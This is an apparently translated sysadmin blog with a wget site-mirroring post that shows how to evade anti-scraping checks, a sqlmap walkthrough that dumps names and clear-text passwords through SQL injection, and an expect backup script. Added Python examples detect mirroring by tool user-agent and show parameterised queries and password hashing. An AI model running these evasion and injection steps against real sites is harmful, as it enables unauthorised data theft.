11/11/2011

Backing up a website with wget

A few days ago I had to back up a website without knowing its FTP credentials. Luckily it was a site with no server-side code, so saving a local copy of it was fairly easy for me.


To do this I used the mighty wget, specifically the command:

nightfly@nightbox:~$ wget -r www.siteexample.it

The whole content of the site was automatically saved in the directory www.siteexample.it.

I must admit I was a bit lucky, though. Not every web server lets you freely dump its sites (does the word phishing ring a bell?). Precisely to prevent this practice, a protection mechanism based on recognising the web client is very often implemented: if the server notices that it is wget requesting the site's pages, it will refuse.

That check is easily bypassed, however. wget lets you spoof the client, which can be set manually by typing:

nightfly@nightbox:~$ wget -r -U "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" www.siteexample.it

If instead the checks were also based on the time elapsing between one page view and the next, or on the download speed of the pages, it is enough to use the --wait and --limit-rate flags properly:

nightfly@nightbox:~$ wget --wait=30 --limit-rate=10K -r -U "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" www.siteexample.it

And the backup of the site is ready.

See you soon.
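Added here as an example (my code, not from the post): the two server-side checks the post describes, run over constructed access-log lines. The User-Agent check catches a client that announces itself as wget, the per-second burst check catches a spoofed User-Agent fetching too fast, and a client that spoofs the User-Agent and paces itself as --wait does passes both, which is exactly the limit the post points out.

```python
import re
from collections import Counter, defaultdict

# Constructed Apache combined-format lines (not from the page): a client that
# announces itself as wget, a UA-spoofed client fetching in a burst, and a
# UA-spoofed client that paces itself as --wait does; the last one looks like a
# person to both checks below, which is the limit of this kind of detection.
SAMPLE_LOG = """\
203.0.113.5 - - [11/Nov/2011:09:00:01 +0100] "GET /index.html HTTP/1.0" 200 5120 "-" "Wget/1.12 (linux-gnu)"
203.0.113.5 - - [11/Nov/2011:09:00:02 +0100] "GET /about.html HTTP/1.0" 200 3011 "-" "Wget/1.12 (linux-gnu)"
198.51.100.7 - - [11/Nov/2011:09:00:05 +0100] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
198.51.100.7 - - [11/Nov/2011:09:00:05 +0100] "GET /a.html HTTP/1.1" 200 100 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
198.51.100.7 - - [11/Nov/2011:09:00:05 +0100] "GET /b.html HTTP/1.1" 200 100 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
198.51.100.7 - - [11/Nov/2011:09:00:05 +0100] "GET /c.html HTTP/1.1" 200 100 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
198.51.100.7 - - [11/Nov/2011:09:00:05 +0100] "GET /d.html HTTP/1.1" 200 100 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
198.51.100.7 - - [11/Nov/2011:09:00:05 +0100] "GET /e.html HTTP/1.1" 200 100 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
192.0.2.9 - - [11/Nov/2011:09:00:10 +0100] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
192.0.2.9 - - [11/Nov/2011:09:00:40 +0100] "GET /about.html HTTP/1.1" 200 3011 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
"""

# ip ident user [timestamp] "request" status bytes "referer" "user-agent"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "[^"]*" \d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
# Substrings that identify common mirroring/download tools in the User-Agent.
TOOL_UA_MARKERS = ("wget", "curl", "httrack")

def parse(log_text):
    """Yield (ip, timestamp truncated to the second, user_agent) per well-formed line."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield m.group("ip"), m.group("ts").split(" ")[0], m.group("ua")

def flag_mirroring(log_text, max_hits_per_second=5):
    """Return {ip: sorted reasons} for clients whose traffic looks like site mirroring."""
    reasons = defaultdict(set)
    hits = Counter()  # (ip, second) -> number of requests in that second
    for ip, second, ua in parse(log_text):
        if any(marker in ua.lower() for marker in TOOL_UA_MARKERS):
            reasons[ip].add("tool user-agent")
        hits[(ip, second)] += 1
        if hits[(ip, second)] > max_hits_per_second:
            reasons[ip].add("burst")
    return {ip: sorted(r) for ip, r in reasons.items()}
```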

09:34 Written by: nazarenolatella in OS: Linux | Tags: wget, web, dump, backup, web client, web server, ftp

06/09/2011

Finding possible SQLi vulnerabilities on your own site with sqlmap

Foreword

The main purpose of this short guide is to show sysadmins/DBAs/developers how to test the robustness of their own server/application against SQL injection attacks.

A fairly easy-to-use tool for this kind of test is called sqlmap.

Here are the steps I followed to "dump" the content of a MySQL database sitting behind a "buggy" web portal:

C:\Users\eldo\Desktop\sqlmap>sqlmap.py -u http://vulnsite.it/view_book.php?id=1

    sqlmap/0.9-dev - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 08:05:07

[08:05:07] [INFO] using 'C:\Users\eldo\Desktop\sqlmap\output\vulnsite.it\session' as session file
[08:05:07] [INFO] testing connection to the target url
[08:05:08] [INFO] testing if the url is stable, wait a few seconds
[08:05:10] [INFO] url is stable
[08:05:10] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
[08:05:11] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
[08:05:11] [INFO] testing if GET parameter 'id' is dynamic
[08:05:12] [INFO] confirming that GET parameter 'id' is dynamic
[08:05:13] [INFO] GET parameter 'id' is dynamic
[08:05:13] [INFO] testing sql injection on GET parameter 'id' with 0 parenthesis

[08:05:13] [INFO] testing unescaped numeric injection on GET parameter 'id'
[08:05:14] [INFO] confirming unescaped numeric injection on GET parameter 'id'
[08:05:14] [INFO] GET parameter 'id' is unescaped numeric injectable with 0 parenthesis
[08:05:14] [INFO] testing for parenthesis on injectable parameter
[08:05:16] [INFO] the injectable parameter requires 0 parenthesis
[08:05:16] [INFO] testing MySQL
[08:05:17] [INFO] confirming MySQL
[08:05:18] [INFO] retrieved: 3
[08:05:23] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.3, ASP.NET
back-end DBMS: MySQL >= 5.0.0


[*] shutting down at: 08:05:23

Once I've established that the portal is vulnerable, I go on to enumerate the databases:

C:\Users\eldo\Desktop\sqlmap>sqlmap.py -u http://vulnsite.it/view_book.php?id=1 --dbs

    sqlmap/0.9-dev - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 08:06:20

[08:06:20] [INFO] using 'C:\Users\eldo\Desktop\sqlmap\output\s12447-15xnnvzre.roma.coliseumlab.net\session' as session file
[08:06:20] [INFO] resuming match ratio '0.946' from session file
[08:06:20] [INFO] resuming injection point 'GET' from session file
[08:06:20] [INFO] resuming injection parameter 'id' from session file
[08:06:20] [INFO] resuming injection type 'numeric' from session file
[08:06:20] [INFO] resuming 0 number of parenthesis from session file
[08:06:20] [INFO] resuming back-end DBMS 'mysql 5' from session file
[08:06:20] [INFO] testing connection to the target url
[08:06:20] [INFO] testing for parenthesis on injectable parameter
[08:06:20] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.3, ASP.NET
back-end DBMS: MySQL 5

[08:06:20] [INFO] fetching database names
[08:06:20] [INFO] fetching number of databases
[08:06:20] [INFO] retrieved: 2
[08:06:25] [INFO] retrieved: information_schema
[08:08:05] [INFO] retrieved: 12447_15_1
available databases [2]:
[*] 12447_15_1
[*] information_schema

[08:09:04] [INFO] Fetched data logged to text files under 'C:\Users\eldo\Desktop\sqlmap\output\vulnsite.it'

[*] shutting down at: 08:09:04


I use the 12447_15_1 DB as the target and go on to enumerate its tables:

C:\Users\eldo\Desktop\sqlmap>sqlmap.py -u http://vulnsite.it/view_book.php?id=1 -D 12447_15_1 --tables

    sqlmap/0.9-dev - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 08:06:20

[08:12:07] [INFO] using 'C:\Users\eldo\Desktop\sqlmap\output\vulnsite.it\session' as session file
[08:12:07] [INFO] resuming match ratio '0.946' from session file
[08:12:07] [INFO] resuming injection point 'GET' from session file
[08:12:07] [INFO] resuming injection parameter 'id' from session file
[08:12:07] [INFO] resuming injection type 'numeric' from session file
[08:12:07] [INFO] resuming 0 number of parenthesis from session file
[08:12:07] [INFO] resuming back-end DBMS 'mysql 5' from session file
[08:12:07] [INFO] testing connection to the target url
[08:12:08] [INFO] testing for parenthesis on injectable parameter
[08:12:08] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.3, ASP.NET
back-end DBMS: MySQL 5

[08:12:08] [INFO] fetching tables for database '12447_15_1'
[08:12:08] [INFO] fetching number of tables for database '12447_15_1'
[08:12:08] [INFO] retrieved: 2
[08:12:13] [INFO] retrieved: books
[08:12:41] [INFO] retrieved: club_members
Database: 12447_15_1
[2 tables]
+--------------+
| books        |
| club_members |
+--------------+

[08:13:43] [INFO] Fetched data logged to text files under 'C:\Users\eldo\Desktop\sqlmap\output\vulnsite.it'

[*] shutting down at: 08:13:43

Now I enumerate the columns of the club_members table:

C:\Users\eldo\Desktop\sqlmap>sqlmap.py -u http://vulnsite.it/view_book.php?id=1 -D 12447_15_1 -T club_members --columns

    sqlmap/0.9-dev - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 08:21:36

[08:21:36] [INFO] using 'C:\Users\eldo\Desktop\sqlmap\output\s12447-15xnnvzre.roma.coliseumlab.net\session' as session file
[08:21:36] [INFO] resuming match ratio '0.946' from session file
[08:21:36] [INFO] resuming injection point 'GET' from session file
[08:21:36] [INFO] resuming injection parameter 'id' from session file
[08:21:36] [INFO] resuming injection type 'numeric' from session file
[08:21:36] [INFO] resuming 0 number of parenthesis from session file
[08:21:36] [INFO] resuming back-end DBMS 'mysql 5' from session file
[08:21:36] [INFO] testing connection to the target url
[08:21:37] [INFO] testing for parenthesis on injectable parameter
[08:21:37] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.3, ASP.NET
back-end DBMS: MySQL 5

[08:21:37] [INFO] fetching columns for table 'club_members' on database '12447_15_1'
[08:21:37] [INFO] fetching number of columns for table 'club_members' on database '12447_15_1'
[08:21:37] [INFO] retrieved: 6
[08:21:42] [INFO] retrieved: id
[08:21:56] [INFO] retrieved: mediumint(8) unsigned
[08:23:46] [INFO] retrieved: name
[08:24:13] [INFO] retrieved: varchar(255)
[08:25:21] [INFO] retrieved: city
[08:25:46] [INFO] retrieved: varchar(50)
[08:26:47] [INFO] retrieved: zip
[08:27:06] [INFO] retrieved: varchar(10)
[08:28:04] [INFO] retrieved: username
[08:28:53] [INFO] retrieved: varchar(255)
[08:29:57] [INFO] retrieved: password
[08:30:47] [INFO] retrieved: varchar(255)
Database: 12447_15_1
Table: club_members
[6 columns]
+----------+-----------------------+
| Column   | Type                  |
+----------+-----------------------+
| city     | varchar(50)           |
| id       | mediumint(8) unsigned |
| name     | varchar(255)          |
| password | varchar(255)          |
| username | varchar(255)          |
| zip      | varchar(10)           |
+----------+-----------------------+

[08:31:51] [INFO] Fetched data logged to text files under 'C:\Users\eldo\Desktop\sqlmap\output\vulnsite.it'

[*] shutting down at: 08:31:51

Finally, since I now know the table structure, I can dump the fields I'm interested in, namely name and password:

C:\Users\eldo\Desktop\sqlmap>sqlmap.py -u http://vulnsite.it/view_book.php?id=1 -D 12447_15_1 -T club_members -C name,password --dump

    sqlmap/0.9-dev - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 08:39:44

[08:39:44] [INFO] using 'C:\Users\eldo\Desktop\sqlmap\output\s12447-15xnnvzre.roma.coliseumlab.net\session' as session file
[08:39:44] [INFO] resuming match ratio '0.946' from session file
[08:39:44] [INFO] resuming injection point 'GET' from session file
[08:39:44] [INFO] resuming injection parameter 'id' from session file
[08:39:44] [INFO] resuming injection type 'numeric' from session file
[08:39:44] [INFO] resuming 0 number of parenthesis from session file
[08:39:44] [INFO] resuming back-end DBMS 'mysql 5' from session file
[08:39:44] [INFO] testing connection to the target url
[08:39:45] [INFO] testing for parenthesis on injectable parameter
[08:39:45] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.3, ASP.NET
back-end DBMS: MySQL 5

[08:39:45] [INFO] fetching columns 'name, password' entries for table 'club_members' on database '12447_15_1'
[08:39:45] [INFO] fetching number of columns 'name, password' entries for table 'club_members' on database '12447_15_1'
[08:39:45] [INFO] read from file 'C:\Users\eldo\Desktop\sqlmap\output\s12447-15xnnvzre.roma.coliseumlab.net\session': 30
[08:39:45] [INFO] retrieved: Ignacia
[08:40:23] [INFO] read from file 'C:\Users\eldo\Desktop\sqlmap\output\s12447-15xnnvzre.roma.coliseumlab.net\session': AYM91SVH8JL
[08:40:23] [INFO] retrieved: Isaac
[08:40:51] [INFO] retrieving the length of query output
[08:40:51] [INFO] retrieved: 11
[08:41:06] [INFO] resumed from file 'C:\Users\eldo\Desktop\sqlmap\output\s12447-15xnnvzre.roma.coliseumlab.net\session': WVJ39RFZ...
[08:41:06] [INFO] retrieving pending 3 query output characters
[08:41:25] [INFO] retrieved: Roth
[08:41:50] [INFO] retrieved: PRK18UOR6YA
[08:42:51] [INFO] retrieved: Laurel
[08:43:24] [INFO] retrieved: RKS21YTS6EV
[08:44:27] [INFO] retrieved: Ina
[08:44:47] [INFO] retrieved: HHQ64HDD7VJ
[08:45:50] [INFO] retrieved: Samantha
[08:46:33] [INFO] retrieved: BAA37FRB5IR
[08:47:30] [INFO] retrieved: Walter
[08:48:04] [INFO] retrieved: AQD75ZVP9WA
[08:49:02] [INFO] retrieved: Petra
[08:49:31] [INFO] retrieved: BAI67DMT7PN
[08:50:29] [INFO] retrieved: Fleur
[08:50:58] [INFO] retrieved: PJE89BUA1DP
[08:51:58] [INFO] retrieved: Rowan
[08:52:30] [INFO] retrieved: FCY82VKV1PS
[08:53:29] [INFO] retrieved: Cairo
[08:53:59] [INFO] retrieved: GGT75OJT6IO
[08:54:57] [INFO] retrieved: Ruud
[08:55:23] [INFO] retrieved: 166648
[08:55:58] [INFO] retrieved: Cheryl
[08:56:33] [INFO] retrieved: WJI80JKK9XQ
[08:57:30] [INFO] retrieved: Olivia
[08:58:03] [INFO] retrieved: PMO19LFU8OP
[08:59:00] [INFO] retrieved: Sara
[08:59:24] [INFO] retrieved: UHE33ZHA4VD
[09:00:22] [INFO] retrieved: Hermione
[09:01:04] [INFO] retrieved: AHW26AKK3PT
[09:02:01] [INFO] retrieved: Jingo
[09:02:30] [INFO] retrieved: KFV13NWK8SR
[09:03:27] [INFO] retrieved: Ingrid
[09:04:01] [INFO] retrieved: GSR33YLT1GY
[09:04:59] [INFO] retrieved: Kay
[09:05:19] [INFO] retrieved: MZO03VPQ5GA
[09:06:17] [INFO] retrieved: Stone
[09:06:47] [INFO] retrieved: JCD09KIK3XN
[09:07:46] [INFO] retrieved: Quinn
[09:08:15] [INFO] retrieved: IRC74DPU2TU
[09:09:13] [INFO] retrieved: Castor
[09:09:48] [INFO] retrieved: DCA08WQE5SW
[09:10:46] [INFO] retrieved: Wyoming
[09:11:25] [INFO] retrieved: XFL08LPA5QA
[09:12:24] [INFO] retrieved: Harlan
[09:12:58] [INFO] retrieved: HOO93MSH6EK

Luckily the passwords are stored in clear text (and not as hashes), so "stealing" them was child's play.

End of post, see you soon.

15:44 Written by: nazarenolatella in Security | Tags: sqldump, get, post, vuln, sqli, sql injection, dump, id
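Added here as an example (my code, not from the post and not the vulnerable portal's code, which the page does not show; written in Python with SQLite instead of the portal's PHP/MySQL so it runs stand-alone): the "unescaped numeric injection" on the id parameter that sqlmap reported, beside the hardened form of the same lookup, plus the salted hashing that would have made the dumped password column useless to whoever pulled it.

```python
import hashlib
import hmac
import os
import sqlite3

PBKDF2_ROUNDS = 200_000

def make_db():
    """Constructed stand-in for the page's DB: table and column names are taken
    from the sqlmap output, the row values are made up; SQLite so it runs offline."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE books (id INTEGER PRIMARY KEY, title TEXT);
        CREATE TABLE club_members (id INTEGER PRIMARY KEY, name TEXT, city TEXT,
                                   zip TEXT, username TEXT, password TEXT);
        INSERT INTO books VALUES (1, 'First book'), (2, 'Second book');
    """)
    return conn

def view_book_vulnerable(conn, book_id):
    """The flaw sqlmap reported: the raw GET value is pasted into the SQL text."""
    sql = "SELECT id, title FROM books WHERE id = " + book_id  # unescaped numeric
    return conn.execute(sql).fetchall()

def view_book_hardened(conn, book_id):
    """Validate the type, then bind the value: the DB never parses user input as SQL."""
    if not book_id.isdigit():
        return []  # anything that is not a plain integer is simply "no such book"
    return conn.execute("SELECT id, title FROM books WHERE id = ?", (int(book_id),)).fetchall()

def hash_password(pw, salt=None):
    """What the club_members.password column should hold: 'salt$pbkdf2', never clear text."""
    salt = salt if salt is not None else os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", pw.encode(), salt, PBKDF2_ROUNDS)
    return f"{salt.hex()}${dk.hex()}"

def check_password(pw, stored):
    """Recompute with the stored salt and compare in constant time."""
    salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", pw.encode(), bytes.fromhex(salt_hex), PBKDF2_ROUNDS)
    return hmac.compare_digest(dk.hex(), dk_hex)
```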

25/07/2011

Script for the daily backup of a remote database

Since there is never too much redundancy (does Murphy ring a bell?), I thought I'd write a script to back up a database hosted on a remote server.

Here is the script (based on expect):

#!/usr/bin/expect -f
# Date suffix for the dump file name, e.g. 25_07_11
set date [exec date +%d_%m_%y]
# SSH password of the remote server that hosts the database
set password1 "<pass1>"
# SSH password of the destination server the dump is copied to
set password2 "<pass2>"
set database "<nomedb>"
# Log in to the remote server
spawn ssh user@hostname
expect "*?assword:*"
send "$password1\r"
send "\r"
expect ":~$"
# Dump the database to a file named <database>_<date>.pl
send "mysqldump $database -u root -ppassvostrodb > ${database}_$date.pl\r"
# Copy the dump to my server with scp (it asks for password2)
send "scp ${database}_$date.pl user@hostname:/home/user\r"
expect "*?assword:*"
send "$password2\r"
send "\r"
expect ":~$"
# Remove the dump from the remote server and close the session
send "rm ${database}_*\r"
expect ":~$"
send "exit\r"
expect eof

The script connects to the remote server via SSH, dumps the database and then copies it to my server via SCP.

For the script to run daily (at 10 pm, to be precise), edit the /etc/crontab file and add the following directive:

00 22   * * * user  cd /home/user/ && ./backupremotedb > /dev/null 2>&1

For further info, contact me.

See you soon.

12:39 Written by: nazarenolatella in OS: Linux | Tags: expect, shell, bash, linux, dump, mysql, ssh, scp